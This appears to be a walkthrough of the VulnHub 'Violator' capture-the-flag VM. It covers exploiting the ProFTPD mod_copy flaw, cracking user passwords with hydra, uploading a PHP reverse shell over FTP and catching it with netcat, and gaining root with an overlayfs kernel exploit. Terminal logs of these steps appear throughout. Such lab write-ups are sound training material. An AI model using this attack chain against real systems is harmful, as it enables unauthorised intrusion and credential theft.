Today I’m ready to publish my first walkthrough against the vm hosted on vulnhub called Violator by knightmare.
Starting with this, we can find a few notes on vulnhub’s page’s description from Knightmare.
Those are the informations:
- Vince Clarke can help you with the Fast Fashion.
- The challenge isn’t over with root. The flag is something special.
- I have put a few trolls in, but only to sport with you.
We need to find the vm’s ip, so I used netdiscover:
Then, as always, I used nmap to discover its open ports:
The scanning result reveals that the Proftpd 1.3.5rc3 runs on port 21 and Apache httpd 2.4.7 runs on port 80.
I browsed into HTTP server and I saw this:
I found a link for the Violator album’s Wikipedia page by the Depeche Mode in webpage’s source code. The web server didn’t have anything else of interest.
Now we can browse through exploit-db and find out if services are exploitable or we have to use searchsploit. I found out that the FTP server is exploitable:
Ok! Now this is interesting because we can use the mod_copy module to read and write files on system:
Copied successfully!
I navigated on web browser to see interesting files and I found out four users named dg,mg,af and aw:
These usernames are matched with the initials of the Depeche Mode’s members. They are Dave Gahan, Martin Gore, Andy Fletcher, and Alan Wilder.
In /etc/group folder I saw that the user dg is a member of several groups, so let’s try to crack the passwords of these users. I came back to the wikipedia page the one before, and I tried to catch hot words for the creation of wordlist. Initially I used cewl, for extracting all words from the website and then I used tr and sed commands to create all possible combinations. At the end I launched hydra for cracking the passwords of all users:
With big surprise I found all users’ passwords- yup!! 
At this point I connected with dg user and then I uploaded /usr/share/webshells/php/php-reverse-shell.php reverse shell. I updated $ip var in php shell and I launched netcat listener. I spawned bash shell with python, and I logged with dg user. I tried to elevate with sudo command but unsuccessfully.
root@kali:~/Scrivania/reports/violator# cp /usr/share/webshells/php/php-reverse-shell.php /var/www/html
root@kali:~/Scrivania/reports/violator# ftp 192.168.1.141
Connected to 192.168.1.141.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.1.141]
Name (192.168.1.141:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put /var/www/html/php-reverse-shell.php
local: /var/www/html/php-reverse-shell.php remote: /var/www/html/php-reverse-shell.php
200 PORT command successful
150 Opening BINARY mode data connection for /var/www/html/php-reverse-shell.php
226 Transfer complete
5495 bytes sent in 0.00 secs (16.9046 MB/s)
ftp> exit
421 No transfer timeout (600 seconds): closing control connection
root@kali:~/Scrivania/reports/violator# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.140] from (UNKNOWN) [192.168.1.141] 41839
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
17:12:02 up 4:21, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@violator:/$ su dg
su dg
Password: policyoftruth
dg@violator:/$ sudo -l
sudo -l
Matching Defaults entries for dg on violator:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dg may run the following commands on violator:
(ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
With sudo command I saw the proftpd’s executable into /home/dg/bd/sbin folder but I decided to come back later on this folder. Navigating into another directories, look what I’ve just found new interesting files!
dg@violator:/home/dg$ ls -l bd
ls -l
total 32
drwxr-xr-x 2 root root 4096 Jun 6 2016 bin
drwxr-xr-x 2 root root 4096 Jun 6 2016 etc
drwxr-xr-x 3 root root 4096 Jun 6 2016 include
drwxr-xr-x 4 root root 4096 Jun 6 2016 lib
drwxr-xr-x 2 root root 4096 Jun 6 2016 libexec
drwxr-xr-x 2 root root 4096 Jun 6 2016 sbin
drwxr-xr-x 4 root root 4096 Jun 6 2016 share
drwxr-xr-x 2 root root 4096 May 1 17:13 var
dg@violator:/home$ ls -l mg
ls -l mg
total 4
-rw-rw-r-- 1 mg mg 112 Jun 12 09:28 faith_and_devotion
dg@violator:/home$ ls -l aw
ls -l aw
total 4
-rw-rw-r-- 1 aw aw 59 Jun 12 09:19 hint
dg@violator:/home$ ls -l af
ls -l af
total 20
drwxr-xr-x 2 af af 4096 Jun 11 2016 minarke-1.21
-rw-rw-r-- 1 af af 15576 Jun 11 2016 minarke-1.21.tar.bz2
In mg’s home directory, as you can see, we find “faith_and_devotion” file:
Lyrics:
* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D
In aw’s home directory we find “hint” file:
You are getting close... Can you crack the final enigma..?
In af’s home directory we find “minarke-1.21” tar.bz2 and its extraction. Minarke is an Enigma M4 emulator and because I’ve already thought that the faith_and_devotion istructions could be used to decrypt anything, I’ve downloaded all these files.
I came back in /home/dg/bd/sbin folder, I tried to launch proftpd with sudo command and it seemed that it binded on port 2121 on 127.0.0.1. I telneted to 127.0.0.1 2121 and I found proftpd version 1.3.3c:
dg@violator:/home/bd/sbin$ sudo ./proftpd
sudo ./proftpd
- setting default address to 127.0.0.1
localhost - SocketBindTight in effect, ignoring DefaultServer
dg@violator:/home/bd/sbin$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2121 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.141:41838 192.168.1.140:1234 CLOSE_WAIT -
tcp 0 0 192.168.1.141:41839 192.168.1.140:1234 ESTABLISHED 1396/bash
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 1 0 192.168.1.141:80 192.168.1.140:59802 CLOSE_WAIT -
tcp6 0 0 192.168.1.141:21 192.168.1.140:43640 FIN_WAIT2 -
tcp6 0 0 192.168.1.141:80 192.168.1.140:59804 ESTABLISHED -
dg@violator:/home/bd/sbin$ telnet 127.0.0.1 2121
telnet 127.0.0.1 2121
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]
421 Login timeout (300 seconds): closing control connection
Connection closed by foreign host.
dg@violator:/home/bd/sbin$ uname -a
uname -a
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
I launched uname command to view the current kernel and then I browsed into exploit-db.com and I found overlayfs local2root exploit. I uploaded the overlayfail.c in /tmp folder, I compiled it and I launched a.out and BOOOM! I’m the Root! Then I navigated into the Root folder and I found flag.txt and crocs.rar files:
dg@violator:/tmp$ gcc overlayfail.c
gcc overlayfail.c
dg@violator:/tmp$ ls -l
ls -l
total 20
-rwxrwxr-x 1 dg dg 13567 May 1 17:37 a.out
-rw-r--r-- 1 dg dg 2704 May 1 17:37 overlayfail.c
dg@violator:/tmp$ ./a.out
./a.out
root@violator:/tmp# cd /root
cd /root
root@violator:/root# ls -la
ls -la
total 24
drwx------ 3 root root 4096 Jun 14 2016 .
drwxr-xr-x 22 root root 4096 Jun 14 2016 ..
-rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc
d--x------ 2 root root 4096 Jun 14 2016 .basildon
-rw-r--r-- 1 root root 114 Jun 12 2016 flag.txt
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
root@violator:/root# cat flag.txt
cat flag.txt
I say... I say... I say boy! Pumping for oil or something...?
---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
root@violator:/root# cd .basildon
cd .basildon
root@violator:/root/.basildon# ls -l
ls -l
total 140
-rw-r--r-- 1 root root 140355 Jun 12 2016 crocs.rar
I went back to my local machine and I could see the contents of crocs.rar archive but it was protected by a password. I used rar2john to get the password hash. Then I tried to crack with the wordlist created before:
root@kali:~/Scrivania/reports/violator# rar2john crocs.rar > password.hashes
file name: artwork.jpg
root@kali:~/Scrivania/reports/violator# john password.hashes --wordlist pass.txt
Warning: only loading hashes of type "rar", but also saw type "descrypt"
Use the "--format=descrypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:47 DONE (2017-02-11 23:01) 0g/s 74.90p/s 74.90c/s 74.90C/s World in My Eyes
Session completed
Our artwork.jpg is, of course, the Violator album cover! Does the image perhaps contain a hidden message?
At this time I tried to use exiftool and it revealed a very suspicious Copyright and Rights message:
root@kali:~/Scrivania/reports/violator# exiftool -t artwork.jpg
ExifTool Version Number 10.40
File Name artwork.jpg
Directory .
File Size 183 kB
File Modification Date/Time 2016:06:12 14:38:12+02:00
File Access Date/Time 2017:05:03 00:11:08+02:00
File Inode Change Date/Time 2017:02:11 23:11:08+02:00
File Permissions rw-r--r--
File Type JPEG
File Type Extension jpg
MIME Type image/jpeg
JFIF Version 1.01
Resolution Unit inches
X Resolution 300
Y Resolution 300
Exif Byte Order Big-endian (Motorola, MM)
Image Description Violator
Software Google
Artist Dave Gaham
Copyright UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Exif Version 0220
Date/Time Original 1990:03:19 22:13:30
Create Date 1990:03:19 22:13:30
Sub Sec Time Original 04
Sub Sec Time Digitized 04
Exif Image Width 1450
Exif Image Height 1450
XP Title Violator
XP Author Dave Gaham
XP Keywords created by user dg
XP Subject policyoftruth
Padding (Binary data 1590 bytes, use -b option to extract)
About uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Creator Dave Gaham
Subject created by user dg
Title Violator
Description Violator
Warning [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
Date Acquired 1941:05:09 10:30:18.134
Last Keyword XMP created by user dg
Image Width 1450
Image Height 1450
Encoding Process Baseline DCT, Huffman coding
Bits Per Sample 8
Color Components 3
Y Cb Cr Sub Sampling YCbCr4:2:0 (2 2)
Image Size 1450x1450
Megapixels 2.1
Create Date 1990:03:19 22:13:30.04
Date/Time Original 1990:03:19 22:13:30.04
At this point I tried to use the minarke previously found but I wasn’t be able to make it work, so I googled and I found this site for decrypting enigmas and I used the faith_and_devotion instructions. The final message after decoding looks like this:
ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR
I LL PRESUME BY NOW YOU LL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE INTO KEEP YOU ON YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR SHOUT OUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFERT OHOST THE CTF
AGAIN KNIGHTMARE
Awesome! Knightmare mentioned in this tweet that the final message should be BGH 393X and I think that it is the license plate of a 1981 Ford Corina MkV showed in the Depeche Mode - Useless video.